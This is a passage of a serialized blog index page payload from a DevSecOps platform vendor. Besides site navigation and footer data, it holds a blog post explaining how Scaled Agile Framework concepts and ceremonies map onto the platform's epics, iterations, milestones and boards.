[{"data":1,"prerenderedAt":1209},["ShallowReactive",2],{"/en-us/blog/":3,"navigation-en-us":21,"banner-en-us":433,"footer-en-us":446,"blogCategories-en-us":658,"relatedBlogPosts-en-us":771,"maineFeaturedPost-en-us":1163,"recentFeaturedPosts-en-us":1168,"recentPosts-en-us":1184},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"seo":8,"content":11,"config":13,"_id":15,"_type":16,"title":7,"_source":17,"_file":18,"_stem":19,"_extension":20},"/en-us/blog","en-us",false,"",{"title":9,"description":10},"Blog | GitLab","Tutorials, product information, expert insights, and more from GitLab to help DevSecOps teams build, test, and deploy secure software faster.",{"title":12},"GitLab Blog",{"template":14},"BlogHome","content:en-us:blog:index.yml","yaml","content","en-us/blog/index.yml","en-us/blog/index","yml",{"_path":22,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"data":23,"_id":429,"_type":16,"title":430,"_source":17,"_file":431,"_stem":432,"_extension":20},"/shared/en-us/main-navigation",{"logo":24,"freeTrial":29,"sales":34,"login":39,"items":44,"search":375,"minimal":406,"duo":420},{"config":25},{"href":26,"dataGaName":27,"dataGaLocation":28},"/","gitlab logo","header",{"text":30,"config":31},"Get free trial",{"href":32,"dataGaName":33,"dataGaLocation":28},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":35,"config":36},"Talk to sales",{"href":37,"dataGaName":38,"dataGaLocation":28},"/sales/","sales",{"text":40,"config":41},"Sign in",{"href":42,"dataGaName":43,"dataGaLocation":28},"https://gitlab.com/users/sign_in/","sign in",[45,89,185,190,296,356],{"text":46,"config":47,"cards":49,"footer":72},"Platform",{"dataNavLevelOne":48},"platform",[50,56,64],{"title":46,"description":51,"link":52},"The most comprehensive AI-powered DevSecOps Platform",{"text":53,"config":54},"Explore our Platform",{"href":55,"dataGaName":48,"dataGaLocation":28},"/platform/",{"title":57,"description":58,"link":59},"GitLab Duo (AI)","Build software faster with AI at every stage of development",{"text":60,"config":61},"Meet GitLab Duo",{"href":62,"dataGaName":63,"dataGaLocation":28},"/gitlab-duo/","gitlab duo ai",{"title":65,"description":66,"link":67},"Why GitLab","10 reasons why Enterprises choose GitLab",{"text":68,"config":69},"Learn more",{"href":70,"dataGaName":71,"dataGaLocation":28},"/why-gitlab/","why gitlab",{"title":73,"items":74},"Get started with",[75,80,85],{"text":76,"config":77},"Platform Engineering",{"href":78,"dataGaName":79,"dataGaLocation":28},"/solutions/platform-engineering/","platform engineering",{"text":81,"config":82},"Developer Experience",{"href":83,"dataGaName":84,"dataGaLocation":28},"/developer-experience/","Developer experience",{"text":86,"config":87},"MLOps",{"href":88,"dataGaName":86,"dataGaLocation":28},"/topics/devops/the-role-of-ai-in-devops/",{"text":90,"left":91,"config":92,"link":94,"lists":98,"footer":167},"Product",true,{"dataNavLevelOne":93},"solutions",{"text":95,"config":96},"View all Solutions",{"href":97,"dataGaName":93,"dataGaLocation":28},"/solutions/",[99,124,146],{"title":100,"description":101,"link":102,"items":107},"Automation","CI/CD and automation to accelerate deployment",{"config":103},{"icon":104,"href":105,"dataGaName":106,"dataGaLocation":28},"AutomatedCodeAlt","/solutions/delivery-automation/","automated software delivery",[108,112,116,120],{"text":109,"config":110},"CI/CD",{"href":111,"dataGaLocation":28,"dataGaName":109},"/solutions/continuous-integration/",{"text":113,"config":114},"AI-Assisted Development",{"href":62,"dataGaLocation":28,"dataGaName":115},"AI assisted development",{"text":117,"config":118},"Source Code Management",{"href":119,"dataGaLocation":28,"dataGaName":117},"/solutions/source-code-management/",{"text":121,"config":122},"Automated Software Delivery",{"href":105,"dataGaLocation":28,"dataGaName":123},"Automated software delivery",{"title":125,"description":126,"link":127,"items":132},"Security","Deliver code faster without compromising security",{"config":128},{"href":129,"dataGaName":130,"dataGaLocation":28,"icon":131},"/solutions/security-compliance/","security and compliance","ShieldCheckLight",[133,136,141],{"text":134,"config":135},"Security & Compliance",{"href":129,"dataGaLocation":28,"dataGaName":134},{"text":137,"config":138},"Software Supply Chain Security",{"href":139,"dataGaLocation":28,"dataGaName":140},"/solutions/supply-chain/","Software supply chain security",{"text":142,"config":143},"Compliance & Governance",{"href":144,"dataGaLocation":28,"dataGaName":145},"/solutions/continuous-software-compliance/","Compliance and governance",{"title":147,"link":148,"items":153},"Measurement",{"config":149},{"icon":150,"href":151,"dataGaName":152,"dataGaLocation":28},"DigitalTransformation","/solutions/visibility-measurement/","visibility and measurement",[154,158,162],{"text":155,"config":156},"Visibility & Measurement",{"href":151,"dataGaLocation":28,"dataGaName":157},"Visibility and Measurement",{"text":159,"config":160},"Value Stream Management",{"href":161,"dataGaLocation":28,"dataGaName":159},"/solutions/value-stream-management/",{"text":163,"config":164},"Analytics & Insights",{"href":165,"dataGaLocation":28,"dataGaName":166},"/solutions/analytics-and-insights/","Analytics and insights",{"title":168,"items":169},"GitLab for",[170,175,180],{"text":171,"config":172},"Enterprise",{"href":173,"dataGaLocation":28,"dataGaName":174},"/enterprise/","enterprise",{"text":176,"config":177},"Small Business",{"href":178,"dataGaLocation":28,"dataGaName":179},"/small-business/","small business",{"text":181,"config":182},"Public Sector",{"href":183,"dataGaLocation":28,"dataGaName":184},"/solutions/public-sector/","public sector",{"text":186,"config":187},"Pricing",{"href":188,"dataGaName":189,"dataGaLocation":28,"dataNavLevelOne":189},"/pricing/","pricing",{"text":191,"config":192,"link":194,"lists":198,"feature":283},"Resources",{"dataNavLevelOne":193},"resources",{"text":195,"config":196},"View all resources",{"href":197,"dataGaName":193,"dataGaLocation":28},"/resources/",[199,232,255],{"title":200,"items":201},"Getting started",[202,207,212,217,222,227],{"text":203,"config":204},"Install",{"href":205,"dataGaName":206,"dataGaLocation":28},"/install/","install",{"text":208,"config":209},"Quick start guides",{"href":210,"dataGaName":211,"dataGaLocation":28},"/get-started/","quick setup checklists",{"text":213,"config":214},"Learn",{"href":215,"dataGaLocation":28,"dataGaName":216},"https://university.gitlab.com/","learn",{"text":218,"config":219},"Product documentation",{"href":220,"dataGaName":221,"dataGaLocation":28},"https://docs.gitlab.com/","product documentation",{"text":223,"config":224},"Best practice videos",{"href":225,"dataGaName":226,"dataGaLocation":28},"/getting-started-videos/","best practice videos",{"text":228,"config":229},"Integrations",{"href":230,"dataGaName":231,"dataGaLocation":28},"/integrations/","integrations",{"title":233,"items":234},"Discover",[235,240,245,250],{"text":236,"config":237},"Customer success stories",{"href":238,"dataGaName":239,"dataGaLocation":28},"/customers/","customer success stories",{"text":241,"config":242},"Blog",{"href":243,"dataGaName":244,"dataGaLocation":28},"/blog/","blog",{"text":246,"config":247},"Remote",{"href":248,"dataGaName":249,"dataGaLocation":28},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"text":251,"config":252},"TeamOps",{"href":253,"dataGaName":254,"dataGaLocation":28},"/teamops/","teamops",{"title":256,"items":257},"Connect",[258,263,268,273,278],{"text":259,"config":260},"GitLab Services",{"href":261,"dataGaName":262,"dataGaLocation":28},"/services/","services",{"text":264,"config":265},"Community",{"href":266,"dataGaName":267,"dataGaLocation":28},"/community/","community",{"text":269,"config":270},"Forum",{"href":271,"dataGaName":272,"dataGaLocation":28},"https://forum.gitlab.com/","forum",{"text":274,"config":275},"Events",{"href":276,"dataGaName":277,"dataGaLocation":28},"/events/","events",{"text":279,"config":280},"Partners",{"href":281,"dataGaName":282,"dataGaLocation":28},"/partners/","partners",{"backgroundColor":284,"textColor":285,"text":286,"image":287,"link":291},"#2f2a6b","#fff","Insights for the future of software development",{"altText":288,"config":289},"the source promo card",{"src":290},"/images/navigation/the-source-promo-card.svg",{"text":292,"config":293},"Read the latest",{"href":294,"dataGaName":295,"dataGaLocation":28},"/the-source/","the source",{"text":297,"config":298,"lists":300},"Company",{"dataNavLevelOne":299},"company",[301],{"items":302},[303,308,314,316,321,326,331,336,341,346,351],{"text":304,"config":305},"About",{"href":306,"dataGaName":307,"dataGaLocation":28},"/company/","about",{"text":309,"config":310,"footerGa":313},"Jobs",{"href":311,"dataGaName":312,"dataGaLocation":28},"/jobs/","jobs",{"dataGaName":312},{"text":274,"config":315},{"href":276,"dataGaName":277,"dataGaLocation":28},{"text":317,"config":318},"Leadership",{"href":319,"dataGaName":320,"dataGaLocation":28},"/company/team/e-group/","leadership",{"text":322,"config":323},"Team",{"href":324,"dataGaName":325,"dataGaLocation":28},"/company/team/","team",{"text":327,"config":328},"Handbook",{"href":329,"dataGaName":330,"dataGaLocation":28},"https://handbook.gitlab.com/","handbook",{"text":332,"config":333},"Investor relations",{"href":334,"dataGaName":335,"dataGaLocation":28},"https://ir.gitlab.com/","investor relations",{"text":337,"config":338},"Trust Center",{"href":339,"dataGaName":340,"dataGaLocation":28},"/security/","trust center",{"text":342,"config":343},"AI Transparency Center",{"href":344,"dataGaName":345,"dataGaLocation":28},"/ai-transparency-center/","ai transparency center",{"text":347,"config":348},"Newsletter",{"href":349,"dataGaName":350,"dataGaLocation":28},"/company/contact/","newsletter",{"text":352,"config":353},"Press",{"href":354,"dataGaName":355,"dataGaLocation":28},"/press/","press",{"text":357,"config":358,"lists":359},"Contact us",{"dataNavLevelOne":299},[360],{"items":361},[362,365,370],{"text":35,"config":363},{"href":37,"dataGaName":364,"dataGaLocation":28},"talk to sales",{"text":366,"config":367},"Get help",{"href":368,"dataGaName":369,"dataGaLocation":28},"/support/","get help",{"text":371,"config":372},"Customer portal",{"href":373,"dataGaName":374,"dataGaLocation":28},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":376,"login":377,"suggestions":384},"Close",{"text":378,"link":379},"To search repositories and projects, login to",{"text":380,"config":381},"gitlab.com",{"href":42,"dataGaName":382,"dataGaLocation":383},"search login","search",{"text":385,"default":386},"Suggestions",[387,389,393,395,399,403],{"text":57,"config":388},{"href":62,"dataGaName":57,"dataGaLocation":383},{"text":390,"config":391},"Code Suggestions (AI)",{"href":392,"dataGaName":390,"dataGaLocation":383},"/solutions/code-suggestions/",{"text":109,"config":394},{"href":111,"dataGaName":109,"dataGaLocation":383},{"text":396,"config":397},"GitLab on AWS",{"href":398,"dataGaName":396,"dataGaLocation":383},"/partners/technology-partners/aws/",{"text":400,"config":401},"GitLab on Google Cloud",{"href":402,"dataGaName":400,"dataGaLocation":383},"/partners/technology-partners/google-cloud-platform/",{"text":404,"config":405},"Why GitLab?",{"href":70,"dataGaName":404,"dataGaLocation":383},{"freeTrial":407,"mobileIcon":412,"desktopIcon":417},{"text":408,"config":409},"Start free trial",{"href":410,"dataGaName":33,"dataGaLocation":411},"https://gitlab.com/-/trials/new/","nav",{"altText":413,"config":414},"Gitlab Icon",{"src":415,"dataGaName":416,"dataGaLocation":411},"/images/brand/gitlab-logo-tanuki.svg","gitlab icon",{"altText":413,"config":418},{"src":419,"dataGaName":416,"dataGaLocation":411},"/images/brand/gitlab-logo-type.svg",{"freeTrial":421,"mobileIcon":425,"desktopIcon":427},{"text":422,"config":423},"Learn more about GitLab Duo",{"href":62,"dataGaName":424,"dataGaLocation":411},"gitlab duo",{"altText":413,"config":426},{"src":415,"dataGaName":416,"dataGaLocation":411},{"altText":413,"config":428},{"src":419,"dataGaName":416,"dataGaLocation":411},"content:shared:en-us:main-navigation.yml","Main Navigation","shared/en-us/main-navigation.yml","shared/en-us/main-navigation",{"_path":434,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":435,"titleMobile":435,"button":436,"config":441,"_id":443,"_type":16,"_source":17,"_file":444,"_stem":445,"_extension":20},"/shared/en-us/banner","GitLab 18 & the next step in intelligent DevSecOps.",{"text":437,"config":438},"Watch now",{"href":439,"dataGaName":440,"dataGaLocation":28},"/eighteen/","gitlab 18 banner",{"layout":442},"release","content:shared:en-us:banner.yml","shared/en-us/banner.yml","shared/en-us/banner",{"_path":447,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"data":448,"_id":654,"_type":16,"title":655,"_source":17,"_file":656,"_stem":657,"_extension":20},"/shared/en-us/main-footer",{"text":449,"source":450,"edit":456,"contribute":461,"config":466,"items":471,"minimal":646},"Git is a trademark of Software Freedom Conservancy and our use of 'GitLab' is under license",{"text":451,"config":452},"View page source",{"href":453,"dataGaName":454,"dataGaLocation":455},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":457,"config":458},"Edit this page",{"href":459,"dataGaName":460,"dataGaLocation":455},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":462,"config":463},"Please contribute",{"href":464,"dataGaName":465,"dataGaLocation":455},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":467,"facebook":468,"youtube":469,"linkedin":470},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[472,495,552,581,616],{"title":46,"links":473,"subMenu":478},[474],{"text":475,"config":476},"DevSecOps platform",{"href":55,"dataGaName":477,"dataGaLocation":455},"devsecops platform",[479],{"title":186,"links":480},[481,485,490],{"text":482,"config":483},"View plans",{"href":188,"dataGaName":484,"dataGaLocation":455},"view plans",{"text":486,"config":487},"Why Premium?",{"href":488,"dataGaName":489,"dataGaLocation":455},"/pricing/premium/","why premium",{"text":491,"config":492},"Why Ultimate?",{"href":493,"dataGaName":494,"dataGaLocation":455},"/pricing/ultimate/","why ultimate",{"title":496,"links":497},"Solutions",[498,503,506,508,513,518,522,525,529,534,536,539,542,547],{"text":499,"config":500},"Digital transformation",{"href":501,"dataGaName":502,"dataGaLocation":455},"/solutions/digital-transformation/","digital transformation",{"text":134,"config":504},{"href":129,"dataGaName":505,"dataGaLocation":455},"security & compliance",{"text":123,"config":507},{"href":105,"dataGaName":106,"dataGaLocation":455},{"text":509,"config":510},"Agile development",{"href":511,"dataGaName":512,"dataGaLocation":455},"/solutions/agile-delivery/","agile delivery",{"text":514,"config":515},"Cloud transformation",{"href":516,"dataGaName":517,"dataGaLocation":455},"/topics/cloud-native/","cloud transformation",{"text":519,"config":520},"SCM",{"href":119,"dataGaName":521,"dataGaLocation":455},"source code management",{"text":109,"config":523},{"href":111,"dataGaName":524,"dataGaLocation":455},"continuous integration & delivery",{"text":526,"config":527},"Value stream management",{"href":161,"dataGaName":528,"dataGaLocation":455},"value stream management",{"text":530,"config":531},"GitOps",{"href":532,"dataGaName":533,"dataGaLocation":455},"/solutions/gitops/","gitops",{"text":171,"config":535},{"href":173,"dataGaName":174,"dataGaLocation":455},{"text":537,"config":538},"Small business",{"href":178,"dataGaName":179,"dataGaLocation":455},{"text":540,"config":541},"Public sector",{"href":183,"dataGaName":184,"dataGaLocation":455},{"text":543,"config":544},"Education",{"href":545,"dataGaName":546,"dataGaLocation":455},"/solutions/education/","education",{"text":548,"config":549},"Financial services",{"href":550,"dataGaName":551,"dataGaLocation":455},"/solutions/finance/","financial services",{"title":191,"links":553},[554,556,558,560,563,565,567,569,571,573,575,577,579],{"text":203,"config":555},{"href":205,"dataGaName":206,"dataGaLocation":455},{"text":208,"config":557},{"href":210,"dataGaName":211,"dataGaLocation":455},{"text":213,"config":559},{"href":215,"dataGaName":216,"dataGaLocation":455},{"text":218,"config":561},{"href":220,"dataGaName":562,"dataGaLocation":455},"docs",{"text":241,"config":564},{"href":243,"dataGaName":244,"dataGaLocation":455},{"text":236,"config":566},{"href":238,"dataGaName":239,"dataGaLocation":455},{"text":246,"config":568},{"href":248,"dataGaName":249,"dataGaLocation":455},{"text":259,"config":570},{"href":261,"dataGaName":262,"dataGaLocation":455},{"text":251,"config":572},{"href":253,"dataGaName":254,"dataGaLocation":455},{"text":264,"config":574},{"href":266,"dataGaName":267,"dataGaLocation":455},{"text":269,"config":576},{"href":271,"dataGaName":272,"dataGaLocation":455},{"text":274,"config":578},{"href":276,"dataGaName":277,"dataGaLocation":455},{"text":279,"config":580},{"href":281,"dataGaName":282,"dataGaLocation":455},{"title":297,"links":582},[583,585,587,589,591,593,595,600,605,607,609,611],{"text":304,"config":584},{"href":306,"dataGaName":299,"dataGaLocation":455},{"text":309,"config":586},{"href":311,"dataGaName":312,"dataGaLocation":455},{"text":317,"config":588},{"href":319,"dataGaName":320,"dataGaLocation":455},{"text":322,"config":590},{"href":324,"dataGaName":325,"dataGaLocation":455},{"text":327,"config":592},{"href":329,"dataGaName":330,"dataGaLocation":455},{"text":332,"config":594},{"href":334,"dataGaName":335,"dataGaLocation":455},{"text":596,"config":597},"Environmental, social and governance (ESG)",{"href":598,"dataGaName":599,"dataGaLocation":455},"/environmental-social-governance/","environmental, social and governance",{"text":601,"config":602},"Diversity, inclusion and belonging (DIB)",{"href":603,"dataGaName":604,"dataGaLocation":455},"/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":337,"config":606},{"href":339,"dataGaName":340,"dataGaLocation":455},{"text":347,"config":608},{"href":349,"dataGaName":350,"dataGaLocation":455},{"text":352,"config":610},{"href":354,"dataGaName":355,"dataGaLocation":455},{"text":612,"config":613},"Modern Slavery Transparency Statement",{"href":614,"dataGaName":615,"dataGaLocation":455},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"title":617,"links":618},"Contact Us",[619,622,624,626,631,636,641],{"text":620,"config":621},"Contact an expert",{"href":37,"dataGaName":38,"dataGaLocation":455},{"text":366,"config":623},{"href":368,"dataGaName":369,"dataGaLocation":455},{"text":371,"config":625},{"href":373,"dataGaName":374,"dataGaLocation":455},{"text":627,"config":628},"Status",{"href":629,"dataGaName":630,"dataGaLocation":455},"https://status.gitlab.com/","status",{"text":632,"config":633},"Terms of use",{"href":634,"dataGaName":635,"dataGaLocation":455},"/terms/","terms of use",{"text":637,"config":638},"Privacy statement",{"href":639,"dataGaName":640,"dataGaLocation":455},"/privacy/","privacy statement",{"text":642,"config":643},"Cookie preferences",{"dataGaName":644,"dataGaLocation":455,"id":645,"isOneTrustButton":91},"cookie preferences","ot-sdk-btn",{"items":647},[648,650,652],{"text":632,"config":649},{"href":634,"dataGaName":635,"dataGaLocation":455},{"text":637,"config":651},{"href":639,"dataGaName":640,"dataGaLocation":455},{"text":642,"config":653},{"dataGaName":644,"dataGaLocation":455,"id":645,"isOneTrustButton":91},"content:shared:en-us:main-footer.yml","Main Footer","shared/en-us/main-footer.yml","shared/en-us/main-footer",[659,672,684,695,706,718,729,740,751,761],{"_path":660,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":662,"content":665,"config":666,"_id":669,"_type":16,"title":663,"_source":17,"_file":670,"_stem":671,"_extension":20},"/en-us/blog/categories/agile-planning","categories",{"title":663,"description":664},"Agile Planning","Browse articles related to Agile Planning on the GitLab Blog",{"name":663},{"template":667,"slug":668,"hide":6},"BlogCategory","agile-planning","content:en-us:blog:categories:agile-planning.yml","en-us/blog/categories/agile-planning.yml","en-us/blog/categories/agile-planning",{"_path":673,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":674,"content":677,"config":678,"_id":680,"_type":16,"title":681,"_source":17,"_file":682,"_stem":683,"_extension":20},"/en-us/blog/categories/ai-ml",{"title":675,"description":676},"AI/ML","Browse articles related to AI/ML on the GitLab Blog",{"name":675},{"template":667,"slug":679,"hide":6},"ai-ml","content:en-us:blog:categories:ai-ml.yml","Ai Ml","en-us/blog/categories/ai-ml.yml","en-us/blog/categories/ai-ml",{"_path":685,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":686,"content":689,"config":690,"_id":692,"_type":16,"title":687,"_source":17,"_file":693,"_stem":694,"_extension":20},"/en-us/blog/categories/bulletin-board",{"title":687,"description":688},"Bulletin Board","Browse articles related to Bulletin Board on the GitLab Blog",{"name":687},{"template":667,"slug":691,"hide":6},"bulletin-board","content:en-us:blog:categories:bulletin-board.yml","en-us/blog/categories/bulletin-board.yml","en-us/blog/categories/bulletin-board",{"_path":696,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":697,"content":700,"config":701,"_id":703,"_type":16,"title":698,"_source":17,"_file":704,"_stem":705,"_extension":20},"/en-us/blog/categories/customer-stories",{"title":698,"description":699},"Customer Stories","Browse articles related to Customer Stories on the GitLab Blog",{"name":698},{"template":667,"slug":702,"hide":6},"customer-stories","content:en-us:blog:categories:customer-stories.yml","en-us/blog/categories/customer-stories.yml","en-us/blog/categories/customer-stories",{"_path":707,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":708,"content":711,"config":712,"_id":714,"_type":16,"title":715,"_source":17,"_file":716,"_stem":717,"_extension":20},"/en-us/blog/categories/devsecops",{"title":709,"description":710},"DevSecOps","Browse articles related to DevSecOps on the GitLab Blog",{"name":709},{"template":667,"slug":713,"hide":6},"devsecops","content:en-us:blog:categories:devsecops.yml","Devsecops","en-us/blog/categories/devsecops.yml","en-us/blog/categories/devsecops",{"_path":719,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":720,"content":723,"config":724,"_id":726,"_type":16,"title":721,"_source":17,"_file":727,"_stem":728,"_extension":20},"/en-us/blog/categories/engineering",{"title":721,"description":722},"Engineering","Browse articles related to Engineering on the GitLab Blog",{"name":721},{"template":667,"slug":725,"hide":6},"engineering","content:en-us:blog:categories:engineering.yml","en-us/blog/categories/engineering.yml","en-us/blog/categories/engineering",{"_path":730,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":731,"content":734,"config":735,"_id":737,"_type":16,"title":732,"_source":17,"_file":738,"_stem":739,"_extension":20},"/en-us/blog/categories/news",{"title":732,"description":733},"News","Browse articles related to News on the GitLab Blog",{"name":732},{"template":667,"slug":736,"hide":6},"news","content:en-us:blog:categories:news.yml","en-us/blog/categories/news.yml","en-us/blog/categories/news",{"_path":741,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":742,"content":745,"config":746,"_id":748,"_type":16,"title":743,"_source":17,"_file":749,"_stem":750,"_extension":20},"/en-us/blog/categories/open-source",{"title":743,"description":744},"Open Source","Browse articles related to Open Source on the GitLab Blog",{"name":743},{"template":667,"slug":747,"hide":6},"open-source","content:en-us:blog:categories:open-source.yml","en-us/blog/categories/open-source.yml","en-us/blog/categories/open-source",{"_path":752,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":753,"content":755,"config":756,"_id":758,"_type":16,"title":90,"_source":17,"_file":759,"_stem":760,"_extension":20},"/en-us/blog/categories/product",{"title":90,"description":754},"Browse articles related to Product on the GitLab Blog",{"name":90},{"template":667,"slug":757,"hide":6},"product","content:en-us:blog:categories:product.yml","en-us/blog/categories/product.yml","en-us/blog/categories/product",{"_path":762,"_dir":661,"_draft":6,"_partial":6,"_locale":7,"seo":763,"content":765,"config":766,"_id":768,"_type":16,"title":125,"_source":17,"_file":769,"_stem":770,"_extension":20},"/en-us/blog/categories/security",{"title":125,"description":764},"Browse articles related to Security on the GitLab Blog",{"name":125},{"template":667,"slug":767,"hide":6},"security","content:en-us:blog:categories:security.yml","en-us/blog/categories/security.yml","en-us/blog/categories/security",[772,813,851,887,928,970,1009,1047,1084,1123],{"category":663,"slug":668,"posts":773},[774,790,802],{"content":775,"config":787},{"title":776,"description":777,"authors":778,"heroImage":780,"date":781,"body":782,"category":668,"tags":783},"SAFe without silos in GitLab","Learn how to map the Scaled Agile Framework to the native capabilities of the DevSecOps platform and the advantages that come from doing so.",[779],"Amanda Rueda","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097569/Blog/Hero%20Images/Blog/Hero%20Images/blog-image-template-1800x945%20%2811%29_2hcwWx49wQ7CHfvhhkVH6S_1750097569126.png","2025-04-08","Let's talk about what happens when your organization adopts the Scaled Agile Framework (SAFe) to scale to enterprise levels. You've got multiple teams working on complex products, and you need a way to coordinate all that work. But here's a common headache: Your planning happens in one tool, while your actual development work lives somewhere else entirely.\n\nThis divide creates real problems day-to-day. Developers jump between systems constantly. Product managers struggle to get an accurate picture of progress. And everyone wastes time manually copying information from one place to another. It's precisely the kind of disjointed experience that SAFe was designed to eliminate.\n\nWhile your development teams might already be using GitLab for source code management, CI/CD, and security, you may wonder whether GitLab can also support your planning needs within the SAFe framework. The good news is that GitLab's Agile project management capabilities offer strong support for SAFe, in this article, you'll learn how GitLab maps to SAFe concepts and ceremonies, all within the same DevSecOps platform your software developers already know and love.\n\n## What is SAFe?\n\nSAFe, or the Scaled Agile Framework, is a way to bring Agile principles to large organizations without losing speed, alignment, or customer focus. It takes the iterative and flexible teamwork model of small teams and applies its principles across big organizations that have multiple teams, roadmaps, and stakeholders. This brings the organization into alignment, all planning and executing in the same direction. For product managers, SAFe helps connect strategy to execution so you’re not just shipping fast, you’re shipping the right things, backed by clear priorities and cross-team alignment.\n\nSAFe reduces silos, encourages collaboration, and helps teams rally around customer outcomes, not just tasks. When integrated in GitLab, the magic really happens: visibility, traceability, and delivery all live in one place.\n\n## SAFe terminology in GitLab\n\nFirst, let's establish how SAFe concepts map to GitLab:\n\n| SAFe | GitLab |\n| :---- | :---- |\n| Epic | Top-level Epic |\n| Capability | Sub-epic (Level 1) |\n| Feature | Sub-epic (Level 2) |\n| User Story | Issue |\n| Task | Task |\n| Team | Custom Field / Scoped Label |\n| Sprint | Iteration |\n| Program Increment (PI) | Milestone |\n| Value Stream | Top-level Group |\n| Agile Release Train (ART) | Top-level Group |\n\n\u003Cbr>\u003C/br>\n\nWith this mapping as your guide, you can set up GitLab to mirror your SAFe implementation. The group structure lets you organize around your value streams and ARTs, while the work item hierarchy (with up to seven levels of nested epics!) gives you all the depth you need for complex product portfolios. Whether you're working at the portfolio level (with top-level groups), program level (with subgroups), or team level (with projects), GitLab's organizational structure aligns perfectly with SAFe's hierarchy.\n\n## Supporting SAFe ceremonies in GitLab\n\nNow for the fun part - how do you actually run your SAFe ceremonies in GitLab? Let's walk through each one.\n\n### PI planning\n\nTo facilitate the cross-team alignment and dependency management that makes PI planning successful, GitLab offers several capabilities:\n\n* Use the [Roadmap](https://docs.gitlab.com/user/group/roadmap/) view to visualize features across teams and time periods\n* Assign features to the PI [milestone](https://docs.gitlab.com/user/project/milestones/)\n* Document and visualize cross-team [dependencies](https://docs.gitlab.com/user/project/issues/related_issues/#blocking-issues) as they're identified\n\nGitLab gives you flexibility for PI planning through both the Epic boards (which can be configured to show team assignments) and the Roadmap view (which shows features over time like a Gantt chart). You can switch between these views during your planning session depending on whether you're focusing on the timeline or team organization.\n\n![Roadmap view and epic board](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097577/Blog/Content%20Images/Blog/Content%20Images/image3_aHR0cHM6_1750097576746.gif)\n\n\u003Cbr>\u003C/br>\n\n![Roadmap view with Gantt chart](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097577/Blog/Content%20Images/Blog/Content%20Images/image5_aHR0cHM6_1750097576747.png)\n\n### Refinement\n\nAs a product manager, running effective refinement sessions means having clear visibility into your feature backlog. You can run your refinement session right inside GitLab. No more updating one tool during the meeting and then having to update another tool afterward.\n\nGitLab powers refinement sessions with:\n\n* [Epic boards](https://docs.gitlab.com/user/group/epics/epic_boards/) that group features based on status\n* The ability to view story points directly in the [overview](https://docs.gitlab.com/user/group/epics/epic_boards/#view-count-of-issues-weight-and-progress-of-an-epic)\n* Comprehensive [drawer views](https://docs.gitlab.com/user/group/epics/manage_epics/#open-epics-in-a-drawer) that let you interact with work items without losing context\n* The ability to create and link [child issues](https://docs.gitlab.com/user/group/epics/manage_epics/#add-an-issue-to-an-epic) directly from epics\n\n![SAFe - image 3](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097577/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750097576749.gif)\n\n### Sprint planning\n\nWhen it's time to figure out what your team can tackle in the next sprint, GitLab gives you:\n\n* [Issue boards](https://docs.gitlab.com/user/project/issue_board/) that provide a comprehensive view of your backlog\n* [Total weight](https://docs.gitlab.com/user/project/issue_board/#sum-of-issue-weights) of user stories displayed directly on boards\n* The ability to easily move issues between iterations\n* A collapsible view that simplifies moving stories between sprints\n\nThis means you can keep everything in one place and spend your planning meetings actually planning instead of jumping between tools.\n\n![Sprint planning with GitLab](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097577/Blog/Content%20Images/Blog/Content%20Images/image4_aHR0cHM6_1750097576751.gif)\n\n*💡 Check out [this tutorial on using GitLab to facilitate Scrum](https://docs.gitlab.com/tutorials/scrum_events/) for a detailed glimpse into the power of GitLab in Agile planning and sprint tracking.*\n\n### Daily stand-ups\n\nYour team can gather around the board during daily stand-ups and actually see what everyone's working on, what's stuck, and what's ready for review – all in one view. For your dev team's daily stand-ups, GitLab lets you:\n\n* Create [iteration-scoped](https://docs.gitlab.com/user/project/issue_board/#iteration-lists) boards that show the current sprint's work\n* Display story points/weights directly on cards\n* Use the [drawer view](https://docs.gitlab.com/user/project/issues/managing_issues/#open-issues-in-a-drawer) to access details without leaving the context\n* Highlight tasks at risk through [health status](https://docs.gitlab.com/user/project/issues/managing_issues/#health-status)\n\n![Daily stand-up board](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097577/Blog/Content%20Images/Blog/Content%20Images/image6_aHR0cHM6_1750097576755.png)\n\n### Sprint review\n\nWant to know how your team is doing over time? GitLab provides comprehensive metrics with:\n\n* [Burndown and burnup charts](https://docs.gitlab.com/user/group/iterations/#iteration-burndown-and-burnup-charts) for iterations\n* Velocity tracking\n* [Lead and cycle time](https://docs.gitlab.com/user/group/value_stream_analytics/#lifecycle-metrics) metrics\n* Dashboards that can be scoped to teams\n\nThese metrics help you understand if your team is getting faster, where they're getting stuck, and what you might want to talk about in your next retrospective.\n\n![Burndown and burnup 